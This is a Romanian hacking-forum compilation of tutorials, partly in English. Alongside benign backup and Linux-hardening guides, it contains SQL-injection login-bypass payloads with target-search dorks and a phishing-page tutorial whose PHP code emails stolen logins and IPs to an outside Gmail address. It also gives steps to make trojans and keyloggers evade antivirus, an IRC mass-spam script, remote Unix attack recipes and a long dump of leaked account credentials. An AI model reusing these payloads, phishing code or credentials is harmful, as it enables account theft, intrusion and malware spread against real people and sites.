~Numele imaginii mele va fi Crazy.jpg.
~Fisierul care il ascund va fii NET.txt. :P

Fisierele pe care vrei sa le "injectezi" in imagine trebuie arhivate cu WinRar format .Rar sau .zip
In cazul nostru arhivam NET.txt
Code:

Click dreapta pe NET.txt -> Add to archive -> la Archive name puneti (ex: crazynet.rar)

Deschideti Command Prompt, mergand la :
Code:

Start -> Run -> cmd

In Command Prompt, mergeti la folderul unde sunt fisierele ....

Code:

cd C:\New Folder

Acum tastati:
Code:

copy /b crazy.jpg + crazynet.rar crazy.jpg

Acest fisier seamana cu JPEG, si chear este JPEG, dar inca el contine fisierul pus de tine.

Pentru a vedea/extrage fisierul pus in .jpg ai 2 optiuni:

1. Schimbi extensia din crazy.jpg in crazy.rar
2. Lasi extensia in .jpg si dai click dreapta -> Open with -> Winrar archiver

Avem un Windows proaspat instalat, cu toate driverele, directx, programele favorite, setarile la internet, programe, etc. si am dori sa ramana asa curat si frumos multa vreme. Dar, cand nu te astepti poate crapa, poate fi infectat cu virusi iremediabil. Atunci o luam de la capat: formatam, instalam windows, drivere, programe, facem setari, etc - adica aproape o jumate de zi. Nu ati vrea sa rezolvati toate acestea in 30 minute maxim? Adica: instalare windows, drivere, soft preferat, setari etc.
Pt aceasta veti nevoie de un program care sa faca un backup (imagine) a partitiei pe care aveti windows instalat. Aici va voi arata cum sa faceti aceasta cu Acronis True Image Workstation 9.1.
Poate sa fie si trial, nu conteaza; imaginea pe care o vom pune pe DVD nu va expira niciodata.
Instalati programul amintit, cere restrat la PC, blabla.
Intram in program si din meniul de sus accesam Tools apoi Options. Se va deschide fereastra cu
optiunile din care se selecteaza Default Back-up Options si apoi Media Components. In dreapta, la
tab-ul General, puteti bifa cu incredere Place Acronis True Image Workstation (Full Version) on media, nu si "Place Acronis One-Click Restore on media". De ce am precizat acestea? Pentru ca acest One-Click restaureaza tot hardisk-ul (fizic) dintr-un click, si nu doar o partitie (uzual partitia system C la care aveti imaginea). Deci, se pierd datele de pe celelalte partitii daca bifati "One-Click Restore".

Urmeaza sa dam click pe Backup si va aparea o fereastra noua - Create Backup Wizard. Apasam Next.

Urmeaza sa selectam partitia careia vrem sa-i facem backup. Eu am ales D:\ pt ca acolo am windowsul pt teste. Urmeaza inca un Next.

Acum trebuie sa specificam unde dorim sa fie creat backup-ul - "Back-up Archive Location". Eu am ales sa o faca direct pe un DVD gol, asa sa faceti si voi. Merge si pe CD-uri daca doriti (personal am facut si pe CD). Asadar, introduceti un DVD gol in unitate si selectati DVD-Writer-ul si inscriptionati imaginea direct pe DVD. La File Name scrieti si voi un nume.tib. Mai dati un Next.

In fereastra Backup Mode bifati "Create new full backup archive" si Next. Ultimul.

Peste cateva minute aveti realizat un CD bootabil cu imaginea .tib direct pe disc. Il puneti la pastrat, si-l folositi cand vrei sa aveti un Windows curat si frumos ca la inceput. Atunci veti boota de pe acest DVD, iar la bootare veti fi intampinat de aceeasi interfata cunoscuta si aratoasa. N-aveti decat sa faceti un restore. Atunci cand va va intreba daca doriti ca partitia sa fie Activa, raspundeti cu DA.

Disclaimer
* Acest tutorial este destinat invatarii , a cunoasterii aprofundate a securitatii webserverelor
* NU raspund de ceea ce faceti dupa ce ati dobandit aceste cunostinte

:::: SQL Injection ::::
SQL Injection este metoda care exploateaza erorile din codul aplicatiilor si permite atacatorului sa injecteze comenzi SQL in formele de login feedback forms,cu scopul obtinerii accesului la informatiile din baza de date.
SQL Injection functioneaza deoarece formele de imput permit expresii SQL sa patrunda direct in baza de date.
Construind programme cu SQL pentru a manipula comenzile din baza si in acest fel capatand acces.
Cea mai folosita este SQL login bypass ,injectand in sectia de login si password.
Exemplu : ? OR 1=1?
Schema URL: http://site.com/index.php?id=0 ? OR 1=1?
Alte comenzi :
admin??
? OR 0=0?
? OR=0?
OR 0=0?
? HI OR 1=1?
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x

Cautam astfel de siteuri cu urmatoarele dorkuri :

Code:

?admin\login.asp?
?login.asp?

Cum sa te aperi de astfel de atacuri.
Sistemul trebuie evaluat pentru orice fel de vulnerabilitate ,codurile trebuie sa fie bug free ,si
aplicatiile si tot ce face parte din infrastructura bine satinizate.
La fiecare schimbare a componentelor trebuie facut un web security audit.
Nu are rost sa intru in detalii si in plus nu cunosc indeajuns de mult baza SQL,insa daca nu aveti o infrastructura complexa de care sa aveti grija nici nu se merita sa va complicati.

Reindexarea unui domeniu

De multe ori se intampla ca motoarele de cautare sa va penalizeze numele de domeniu, mai ales daca in trecut a apartinut altcuiva, avand un trecut mai rau famat. In acest tutorial o sa va invat cum sa faceti ca domeniul vostru sa fie reindexat de motoarele de cautare importante, Google si Yahoo.

Google:

Pentru a fi reindexat de google, numele de domeniu trebuie verificat. Asa ca trebuie sa va logati pe contul de Webmaster (daca nu aveti cont va recomand sa va faceti unul pentru a beneficia de o indexare mai buna si de Google Analytics, cel mai bun provider de detalii despre traficul de pe site si multe alte tool-uri utile).
Intrati apoi pe https://www.google.com/webmasters/tools/siteoverview unde veti adauga url-ul site-ului si apasati Add Site. Veti fi redirectionati catre pagina Overview, unde trebuie sa dati click pe link-ul cu numele Verify your site. Veti putea alege una din cele 2 metode de verificare:
1. Uploadarea unui fisier .html pe host.
2. Introducerea unui Meta Tag.
Dupa ce ati ales una din cele 2 metode si ati aplicat-o, tot ce ramane de facut este sa apasati pe butonul Verify.

Yahoo:

Pentru a fi reindexat de Yahoo, numele de domeniu trebuie de asemenea verificat. Va trebui sa va logati pe contul de Yahoo! (sigur aveti din asta) si veti merge la https://siteexplorer.search.yahoo.com/mysites. Aici introduceti url-ul site-ului si apasati Add My Site. Dupa introducerea acestuia, va trebui sa dati click pe Authenticate, unde aveti de ales din 2 metode:
1. Uploadarea unui fisier .html pe host.
2. Introducerea unui Meta Tag.
Dupa ce ati ales una din cele 2 metode si ati aplicat-o, tot ce ramane de facut este sa apasati pe butonul Ready to Authenticate corespunzator.

Cam atat in acest tutorial. Sper sa va fie de folos.

Sa le folositi linistiti :P

Unlimitedgamedownloads.com
Username: ga20me
Password: ke01feb

Dollarwarez.com
Username:-e2ZTjs
Password:-zqObNO

Fulldownloads.us
Username: Af872HskL
Password: XjsdH28N

Warezquality.com
Username: ageg2020
Password: z8fsDfg3

Megashare.com
Username: xthilakx@gmail.com
Password: 4497f13977f99

Warezreleases.com
Username: HnRPxKQz
Password: a59KBV7

Pirateaccess.com
Username/Email: yourfrienddalat@gmail.com
Password: CHh5LKPI

FullReleases.com
Username: naddie
Password: j7AebD

Torrentleech.org

L: asoum P: jansson
L: baggen85 P: andreas
L: binnberg P: yamaha
L: BRANCO P: 123456
L: Bulldogzen P: hemligt
L: burtan P: farsan
L: cnpeo P: familjen
L: coolrob13 P: stockholm
L: CyberLeffe P: vildsvin
L: Damman P: 123456
L: DanneF P: tofsen
L: daniolo P: hammarby
L: Danyboyse P: lister
L: DataDream P: 123456
L: denkan89 P: peppar
L: deetompa P: general
L: dfault P: vinner
L: denkungen P: 123456
L: drjones89 P: kalleanka
L: duck1 P: alexander
L: Dunhild P: smederna
L: Ecu P: liverpool
L: Elac P: fuckyou
L: empedokles P: paradox
L: emmak P: hejsan
L: ewkn P: julskinka
L: Femman P: blommor
L: Fernis P: original
L: Filurina P: limpan
L: fillee P: hejsan
L: finey P: kallekalle
L: flooden P: mikael
L: Fredrikko P: fredrik
L: GabbN P: trustno1
L: guby P: gurgel
L: gustengroda P: bryggan
L: Hecktor72 P: vykortet
L: helgebelt P: snabbmat
L: Hfe P: sallad
L: hhwqq P: geggamoja
L: HornyGuy P: safter
L: iNTERGROOVE P: komplett
L: indigoos P: dunder
L: irru P: marcus
L: jack65 P: krokodil
L: jarzabek P: viking
L: jjoe P: kalle12
L: JockeEkberg P: november
L: jonas666 P: nintendo
L: kittyboy P: krille
L: kjw P: hannes
L: klisster P: daniel
L: kollan P: diesel
L: kreimer P: kungen
L: kris10n P: kicken
L: Lallex P: hammarby
L: kungkiwi P: kalleanka
L: Lasssse P: lassen
L: lgnn P: viktor
L: lillpedde P: mandarin
L: lizze P: underground
L: Lort P: tyrann
L: mastermac P: jungfru
L: matte86 P: mattias
L: meanjap P: daniel
L: mrjarmo P: raider
L: MrSanctuary P: maiden
L: mysmolnet P: polisbil
L: nakensame P: handboll
L: nazze P: johansson
L: neihada P: hotmail
L: nerkoo P: plastmugg
L: nhemlis P: tjockis
L: nicke123 P: emelie
L: NickNack007 P: jamesbond
L: nisse71 P: gustav
L: odb888 P: humbug
L: odelsteken P: pripps
L: oizon89 P: arsenal
L: paaatrik P: 123456
L: palindrom P: mattias
L: papaya P: microsoft
L: Paradiddle P: hejsan
L: pearla P: marianne
L: Petrol P: angels
L: pffzor P: daniel
L: pjbl P: blixten
L: poq P: 666666
L: poppztah P: bollen
L: puujalka P: slipknot
L: QuescraP P: kallekalle
L: Ramouse P: counter
L: rekan81 P: marlboro
L: Ridgeback P: manchester
L: RellikLaires P: empire
L: RippaN P: arsenal
L: ringe P: abcdef
L: roband10 P: kalmar
L: Robbansson P: 12345
L: rog P: 123456
L: Rockenson P: 123456
L: roccster P: kungen
L: Salinho P: apelsin
L: sagytb P: 123456
L: samotdive P: flinta
L: schmotsich P: bajsande
L: Seatracing P: racing
L: SiCkEnInG P: grÃ¶nbete
L: simon223 P: helgonet
L: Skough P: kungen
L: Slatdjana P: fender
L: spackel P: gladiator
L: Stavve P: kossan
L: stringer P: infinity
L: Superstars P: leksand
L: tankaren P: tankar
L: teeze P: hejsan
L: tc P: cocacola
L: tiger81 P: finland
L: tiWe47 P: solens
L: tomos P: kantarell
L: vasadu P: johannes
L: valium29 P: 123456
L: vifta P: smurf
L: VilleV P: akademien
L: vigger P: teater
L: wenzlaff P: klassiker
L: Winsock P: niklas
L: Xanzou P: qwerty
L: Yzerman P: liverpool
L: ZaiNtCure P: kalle99
L: ZaraxZ P: blatte
L: ziq P: sweden
L: znuza P: 666666

Thanx! Not all account working!

Ai de realizat doua etape :

1. Deschide un Notepad in care scri urmatoarele :

[General]
Manufacturer= ex : Smekeru !!
Model= de ex : romania.hackerszone.org
[Support Information]
Line1=scri ce vrei tu
Line2=scri ce vrei tu
Line3=scri ce vrei tu

si pui Line4=,Line5=, cate doresti ; in functie de cat vrei sa scri in windowul de support .

Dupa ce ai terminat de editat acest notepad il salvezi in urmatorul fel : oeminfo.ini

Ca sa va faceti o idee mai clara uite cum arata oeminfo.ini al meu :

[General]
Manufacturer=fatal1ty
Model=romania.hackerszone.org

[Support Information]
Line1= ...:: Informatii Support ::...
Line2= Powered By Fatal1ty

2. In pasul al doilea va trebui sa creezi o mica poza ,in orice program ai la dispozitie , Paint, Paint Shop Pro , Fireworks ,orice . Poza poate sa contina orice dar trebuie sa aiba urmatoarele caracteristici :
Marimea trebuie sa fie : 100 pe 75
si trebuie sa fie salvata ca si : oemlogo.bmp

Perfect daca ai ajuns pana aici esti aproape gata .

Tot ce mai ai de facut este doar sa iei cele doua fisiere create ,si anume : oeminfo.ini si oemlogo.bmp si sa le copii in directorul : C:windowssystem32

GATA !!! Acum iti poti vedea propriile tale caracteristici accesand :

Control Panel / System - properties .

Sper ca v-ati descurcat .

Flood nu este decat o trecere in masa a ceva informatii pe un port de exemplu : Poti avea un server web care merge perfect pe port 80 ... Si dintr-o adta esti atacat pe portul 21 cred ca stiti ce e ala ... Ftp Oare Ce se intampla ?
Ce credeti ?
Serviciile trec in lumea celor drepti) adica Down!! )
Cea mai buna metoda sa scapati de Flood Este sa downloadati un firewall si sa stiti sa il configurati : :cry:
De exemlu ce trebuie sa faca un firewall ca sa nu te floodeze cineva:
Deci o chestie importanta este sa inchida porturile nejustificate!
La cererile justificate sa urmareasca o limita dar cand o depasesc sa blocheze ip-rile respective
Sa deschida porturi numai pentru anumite ip-uri cand vreti sa accesati anumite server

ANTI FLOOD SERVER CS
Un program simplu de folosit
Il instalati oriunde vreti in pc ... porniti Hlds->program alegeti serverul pe care vreti sa ii adaugati patch-ul si dati click pe patch Hlds Toate tentativele de Csdos vor fi respinse :> Si atacurile vor fi inscrise in log ...
link :
http://rapidshare.com/files/127845025/AntiCSDoS.zip
(Vreau sa precisez ca programul nu este al meu ! )

ANTI FLOOD SITE

E usor de facut :
creati antiflood.php
Useri care se connecteaza de mai multe ori intr-un interval de 5 secunde pe pagina securizata vor fi redirectionati ... It's so simple
Incercati sa il puneti cat mai sus in Sursa !

Cod:
if (!isset($_SESSION)) {
session_start();
}
// protectie antiflood croFreak
if($_SESSION['last_session_request'] > time() - 5){
header("location: /antiflood.html");
exit;
}
$_SESSION['last_session_request'] = time();
?>

In curand o sa incerc sa fac un program antiflood Hub!!

Cu nebuniile astea pe offtopic Am prins si eu un moment sa las tutorial asta )) Sper sa va fie de folos :P

Buna, in ultima vreme m-am saturat sa tot vad pe diferite forumuri:

Dati-mi si mie scam la X.

Asa ca am decis sa scriu acest tutorial. In el veti invata cum va puteti face propriul scam la site-ul dorit.

WARNING: Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu .

OK, deci mai intai ne alegem o tinta.

Am ales http://doizece.neogen.ro/.

Navigam pe site-ul ales. Apasam CTRL + S si salvam fisierul .html undeva pe computer.

Il deschidem... Aici poate aparea o problema si anume calea la imagini.

Daca este cale relativa (calea relativa este calea de genul /images/wow.gif) trebuie transformata in cale absoluta (http://tinta.com/images/wow.gif)

Acum ca s-a clarificat, duce-ti-va in fisierul .html care a fost salvat, da-ti CTRL + F scrieti login... (aici cuvintele pot fi diferite.. incercati si parola, password, username etc. dak nu merge login).

Veti avea un cod de genul

. Modificati login2.php in 040147.php!

Acum, la Username, ar trebui sa fie un cod de genul . name="email" ne indica faptul ca, in scriptul PHP de autentificare, email este variabila ce tine numele de utilizator.
Bun, o memoram.
La password, codul ar trebui sa fie asemanator (). Deci, parola e tinuta in variabile password. O memoram si pe aceasta.

Acum, acolo unde ati salvat .html-ul, creeati un fisier nou, numit 040147.php.

In el, adaugati urmatorul cod:

Code:

$to       = "skorpitz@gmail.com";

$name     = $_POST['email'];

$email    = $_POST['email'];

$subject  = $_POST['subject'];

$password = $_POST['password'];

$agent    = $_SERVER['HTTP_USER_AGENT'];

$ip       = $_SERVER['REMOTE_ADDR'];

$d        = date('l dS \of F Y h:i:s A');

$sub      = "Cont nou DoiZece Hacked - $email";

$headers  = "From: $name <$email>\n"; 

$headers .= "Content-Type: text/plain; charset=iso-8859-1\n";

$mes     .= 'Username: '.$email."\n";

$mes     .= "Parola: ".$password."\n";

$mes     .= "Browser: ".$agent."\n";

$mes     .= "IP: ".$ip."\n";

$mes     .= 'Data si timpul: '.$d;



{

mail($to, $sub, $mes, $headers);

header ("Location:http://doizece.neogen.ro/?1=1&dz_nl_m=login_reg&error=1&next_url=index.php%3F");





  

}

?>

Modificati codul

Code:

$to       = "skorpitz@gmail.com";

i puneti mail-ul vostru. Codul de mai sus preia variabilele email si password si le trimite impreuna cu inca cateva detalii folositoare.

Redenumiti .html-ul in index.html sau .php, uploada-ti cele 2 fisiere pe un host si distrati-va. :wink:

Aveti aici cateva siteuri care ofera VPN fara bani!

http://ultravpn.lynanda.com/ ip de franta
www.relakks.com ip de suedia
http://anchorfree.com/downloads/hotspot-shield/ ip de state
http://www.iopus.com/iPig/ ip de state
http://www.secureix.com/ ip de state

AOL si CS probabil sunt stiute de majoritatea utilizatorilor.

Ar mai fi cateva dar nu imi mai gasesc textul unde le-am trecut pe toate!

Cred ca ati auzit cu totii de "brutus" este un brute force pasword generator ce testeaza toate parolele posibile pe un anumit user de caractere diferite(char,integer,alphanumeric),are o"baza de date" restransa cu anumiti useri/parole folosite worldwide restranse in o lista

In acest tutorial vei invata cum sa faci un virus / trojan / keylogger etc.. nedetectabil 100% !

1. I-ati trojanul / keyloggerul sau virusul si pregateste-l ...
2. Download Software Passport (Armadillo) by Silicon Realms
* Aces program te va ajuta sa faci virusul nedetectabil
DOWNLOAD : LINK 1 RS
LINK 2 ( obligatoriu emailul tau deoarece iti trm pe mail de unde sa-l iei )

3. Instalezi programul
4. Il deschizi va arata cama sa :

5. Acum downloadati settingurile gata facute pentru a nu mai avea voi mult de munca !

DOWNLOAD : AICI si
AICI

Downloadat de pe amandoua linkurile deoarece aveti nevoie de ambele file!

6. Le downloadati si le puneti in acelasi folder amandoua fiserele , oriunde in PC
7. Acum daca aveti deschis programul Software Passport da-ti clik in stanga pe " Loading Existing Project " si mergeti la fisierul project.arm acolo unde l-ati salvat
8. Undeva in centru aveti " Files To Protect "
* Stergeti ce e in chnar ( clik pe el si apoi minus > OK )
* Da-ti pe PLUS si selectati virusul sau keyloggerul
9. Mai jos aveti Build Project . O sa va apara mai multe ferestre !
* Voi da-ti doar Yes si OK

10. Acum aveti un virus nedetectabil

PENTRU A VERIFICA INTRATI AICI : www.virustotal.com
Uploadati fiserul dumneavoastra si o sa vedeti ca nu gaseste nimik

Spamming on IRC

First we'll begin with spamming a message to everybody in a channel using one command. Everybody in the channel will be messaged, if he hasn't changed nick when the timer reaches him. Using this command, a certain amount of timers will be created, everybody in that channel will have a certain unique timer, and when the timer is reached he will be messaged. This means that you can join the channel, use the command and leave again, done that they don't know from what channel you spammed them, and you won't be banned or kicked by example. Maybe a lame script, but it can be used to learn certain things about mIRC script procedures. You have to make an alias in mIRC and add the next in it:

spam {
var %x = 1
var %t = 1
set %a YOUR SPAM MESSAGE
while ($nick($chan,%x)) {
/timer 1 %t .msg $ifmatch %a
inc %x
inc %t 30
}
}

Things that can/must be changed:
"YOUR SPAM MESSAGE" = the message that you want to spam
30 = the amount of seconds between two message intervals, this can be a problem for certain servers. In some servers you can let it message every 5 seconds without a problem, but certain servers will give you some error: "target is moving too fast", this means that you are messaging too many messages too fast to users, so you have to increase that variable into a higher value.

If you have done all this, you can use it by typing the next command, you must be in the channel that you want to spam;

/spam #channel

Note: #channel = the channel that you want to spam, you must be in there when you use the command, after using that command you can leave immediately, so the people that receive your messages won't realise what channel you have / had in common.

This was an example for spamming a message, but you can do also other things by changing the .msg in the script.

Example: ping everybody

massping {
var %x = 1
var %t = 1
set %a ping
while ($nick($chan,%x)) {
/timer 1 %t .ctcp $ifmatch %a
inc %x
inc %t 30
}
}

And you can do much more, using this structure.

I. Manipulating login.php Script
[01] Open the terminal and type (without prepending prompt symbols):

$ su -
# sql_tutorial_start

These commands will start all needed services in the background.

[02] Open the browser and check http://localhost/phpmyadmin/.

[03] Have a look at the databse userdb that our login.php script is accessing

[04] Have a look at login.php script. To do this, open another terminal and type:

$ vi login.php

or, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish):

$ mcedit login.php

[05] If you want to see the submitted query to get more information, delete prepending slashes in echo "$query
" line:

[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:

SQL_tutorial_02
[07] Enter username admin which we know is existing. As you can see, we cannot login due to the missing password.

[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.

[10] Out of the query we can see that we have a closing single quote that isn't opened.

[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:

[12] To advance the attack you might whant to check out the /* to comment out all the following. Enter admin' /*" as username then and check the query:

SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''

is what we entered, but only the part before /* is proccessed by the database. This is why the statement is valid.

II. UNION SELECT

[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.

[02] Open the script in the console by typing:

$ vi /yabbse/SSI.php

or use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located.

[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func...r /> [04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL Injection attack.

[05] Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.

[06] Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. Out of the error message, we can see that the inserted SELECT statement doesn't have the equal number of queries. We have to add something to make it equal then.

[07] Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:

[08] Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements.

[09] Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:

[10] Return to a terminal opened at the beginning (or open a new one) and issue commands:

$ su -
# sql_tutorial_stop

This will stop all services needed to pass through this tutorial.

Linux Security Basics

All operations described below require that you know the root password and can su in as root.
Linux Security Overview

One of the main advantages of choosing Linux is that it is very secure and it is very rare to hear of major viruses, worms, or hackers which target Linux systems. That being said, Linux is not perfect and there are many things that need to be done in order to ensure that your Linux distribution is running as securely as possible. First, controlling how users can remotely access your machine is vital to its security. Secondly, a major security issue for any system is running unneeded services in the background that open holes for attackers to gain access. Linux is no different and disabling any services you are not using is also critical in securing Linux.
Remote Access Protocols- SSH2 and telnet

The ease of use of the Linux remote access protocols is one of the strong points of Linux, but not all the protocols are created equal. There are three main remote access protocols that can be found in nearly every Linux distribution

* Telnet- The oldest and least secure of all the remote access protocols, telnet should only be used if it is the only option. All information and especially passwords are sent in plain text, so anyone could intercept the information sent across the network.
* SSH- The first version of a encrypted client found on nearly every Linux machine. This client encrypts all data sent through it and is a secure option.
* SSH2- A revised version of SSH that strengthened the encryption as well as added new features such as scp and sftp which make it easy to transfer files securely over the remote connection.
* OpenSSH- A version of SSH2 that was rewritten for the General Public License (SSH2 is free for non-commercial use only) which has all of the same features as SSH2.

If you wish to allow users to connect remotely to your machine, we recommend that SSH2 (www.ssh.com) or OpenSSH (www.OpenSSH.com) is used to provide a secure connection as well as a secure method of transferring files to remote machines (the old ftp protocol also sends passwords and data in clear text like telnet). An important note is that if you use OpenSSH as you SSH daemon, you will have to force your ssh client to use the SSH2 protocol with the -2 option. To see what version you currently have installed, simply access the SSH man page by typing:

ComputerName:~# man sshd

We also highly recommend that if you do not plan on using some or all of the above services that you disable the corresponding services as described below as well as disable the corresponding ports in your firewall (Linux Firewall Page).
Disabling Unneeded Services

Services are small programs that run in the background that perform many vital operations for both servers and workstations. During a normal install of Linux, many of these services are installed and activated during the boot process by default. Historically, some of these services have had security problems or flaws that have allowed hackers, viruses, and worms to use them as doors into unsuspecting machines. Many of these services, however, are not needed by common users and can be turned off, closing security holes and recovering system resources. Listed below are some common Linux services as well as a method for disabling services that are not needed.
A Description of Common Linux Services

There are a good number of services that Linux uses and it is not possible to discuss them all here. A list containing a short description of many Linux services can be found at http://www.hosef.org/wiki/LinuxServiceDescriptions along with the author's opinion on whether or not the various services should be on or off. Below is a list of common services and our recommendation on whether or not they should be turned off or on. Please note that these service names are slightly different for each version of Linux and some of the services listed below may or may not appear in your listing of services.

* cron, anacron- Cron is responsible for running scheduled system jobs and anacron is responsible for running any missed jobs due to system downtime. Some versions of Linux use these two services to perform housekeeping chores, so they should be left on.
* ftpd- This is the File Transfer Protocol daemon that allows a FTP server to run. If you do not have an FTP server or do not know what that is, turn it off.
* httpd- This is the HTTP daemon that allows a web server to run. If you do not run a web server on your machine, turn it off.
* iptables- One of the major Linux firewall tools. Since it is used to implement many of the standard firewalls, this service should be left enabled.
* isdn- A service for people using ISDN to access the internet. If you do not use ISDN, disable this service
* lpd- The Linux printing daemon. If you do not have a printer, turn it off.
* nfs, nfslock, portmap- Three services required for the old style Linux Network File System format. Unless you are using this format, disable these three services.
* pcmcia- The services for controlling laptop pcmcia devices. Disable this service unless you are running Linux on a laptop
* samba, smb, smbd, nmbd- Various services related to Samba servers for allowing Windows machines to connect to printer or disk shares on your machine. These can be turned off unless you would like to access your Linux shares from Windows.
* sshd, sshd2- These two services allow remote access to your machine from the SSH and SSH2 protocols respectively. If you would like to remotely access your machine, we recommend that you leave sshd2 on and turn off sshd, otherwise both can be turned off (Please note that OpenSSH appears as sshd even though it can use the SSH2 protocol, so if you want to use OpenSSH, leave sshd enabled).
* telnet, telnetd- These services all you to remotely access your machine through telnet. This is very insecure and we recommend disabling telnet.

Using the chkconfig Command to Disable Unneeded Services

One of the easiest ways to disable unneeded services in Linux is the utility chkconfig. It is installed by default in almost all distributions, but an RPM version and a .DEB file for Debian users can also be downloaded. Services in Linux are usually run through two different structures: inetd or the newer xinetd. Inetd is an older super-server that listens for any incoming calls and directs them to the correct service depending on which services it is configured to use. The default services that inetd starts are dependent on what run level the system is in (the default graphical run level is 5). The newer xinetd runs services independent of the current run level and is supposed to be a more secure replacement for inetd. Most distributions Linux mix and match services between the two. The chkconfig utility can be used to manage services run in both types. To view the current configuration of the services, we simply have to type:

ComputerName:~# chkconfig --list

If chkconfig is installed, then a printout similar to the one below should appear:

cron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
...
xinetd based services:
daytime on
daytime-udp off
time off
...

Once you have decided which services you would like to disable, you must check if the services is run through xinetd or inetd and enter the appropriate command. For xinetd services, the command format is simply chkconfig . So if we wanted to turn off daytime in the list above, we would simply type:

ComputerName:~# chkconfig daytime off

Typing in chkconfig --list a second time will now show us that daytime is off. For inetd services, the run levels you wish to change must also be included, making the general command structure look like : chkconfig --level > In the above example, to turn off the httpd services in run levels 3,4, and 5 the command would be:

ComputerName:~# chkconfig --level 345 httpd off

Now, when chkconfig --list is typed in, the following list should appear:

cron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
...
xinetd based services:
daytime off
daytime-udp off
time off
...

The chkconfig utility is an easy way to manage services that run at boot time, but it is important to remember that any services you disabled will still be running until you either reboot or manually kill the service.

Unix Remote Attacks

What are remote hacks?

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we're not really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually exploiting an existing service running on the victim server (which is misconfigured or allows too much access) is the goal. Exporting a NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location run arbitrary commands on the victim server.

Here are a couple of examples:

1. You are root on a host named badguy.
2. You discover the host victim is exporting /home2/old read/writable to the world.
3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
4. Quickly, you create a fred account on badguy.
5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy.
6. After you become fred on badguy, you rlogin to the victim as fred.

Here's another attack involving a buffer overflow:

1. This remote system is running named.
2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick, you compile it and name it sploit.
3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0"
4. A window appears on your terminal that is running as root on ns.example.com.

DoS (Denial of Service) is simply rendering a service incapable of responding to requests in a timely manner. This is a controversial subject, since some people think that DoS is not a hack, and/or is rather juvenile and petty. We prefer to think of them as just one more kind of tool in the toolbox, and as such, will continue to include material on them in the Hack FAQ. Ask yourself which is more alarming - the number of kids trying DoS attacks, or the number of DoS attacks that succeed?

Regardless of your feelings, DoS has been steadily gaining in popularity, whether with hackers mad at other hackers, sysadmins mad at spammers, or whatever - virtually everyone we've run into that is aware of the potential of DoS at least has software to do it, admins included.

Ok,first of all we create a dynamic text field in Flash and give it a variable name of : userip .

Then in the first frame of our Actions Layer we write this code:

loadVariablesNum("script.php", 0);

Then in the same folder of our movie we create a PHP script called : script.php and inside of it we write this line of code:

Save everything and upload these files to your server to see the results!!!
Thank You.

able of Contents

1. Viruses, Worms and Trojans
1. Definitions
2. Virus Varieties
1. Stealth Virus
2. Macro Viruses
3. Linux Viruses
3. Spreading Malware via the Internet
4. Structure of Viruses
5. Virus Detection
2. Lab Experiment
3. Acknowledgements
4. References

Viruses, Worms and Trojans
Unix. The world's first computer virus.

Title of Chapter 1 of The Unix Haters Handbook, ISBN: 1-56884-203-1

The above is indeed the title of a chapter! The book is in fact written by serious computer scientists. Nevertheless, we must disregard the suggestion that Unix is a virus as an attempt at being hilarious. Equally unhelpful are the news media that use the term virus in referring to any piece of malicious software. The academic world uses the term "malware'' for these. Rigorous definitions have been given by many computer security experts but they do not match the typical use even by other security experts. Thus, we must settle for practical "definitions" of malicious software.
Definitions

* Security tools are designed to be used to protect computer systems and networks. These can also be used by unauthorized individuals to probe for weaknesses. Many of the programs that fall in the malware categories below have benevolent uses. For example, worms can be used to distribute computation on idle processors; back doors are useful for debugging programs; and viruses can be written to update source code and patch bugs. The purpose, not the approach, makes a program malicious.
* Back doors, sometimes called trap doors, allow unauthorized access to your system.
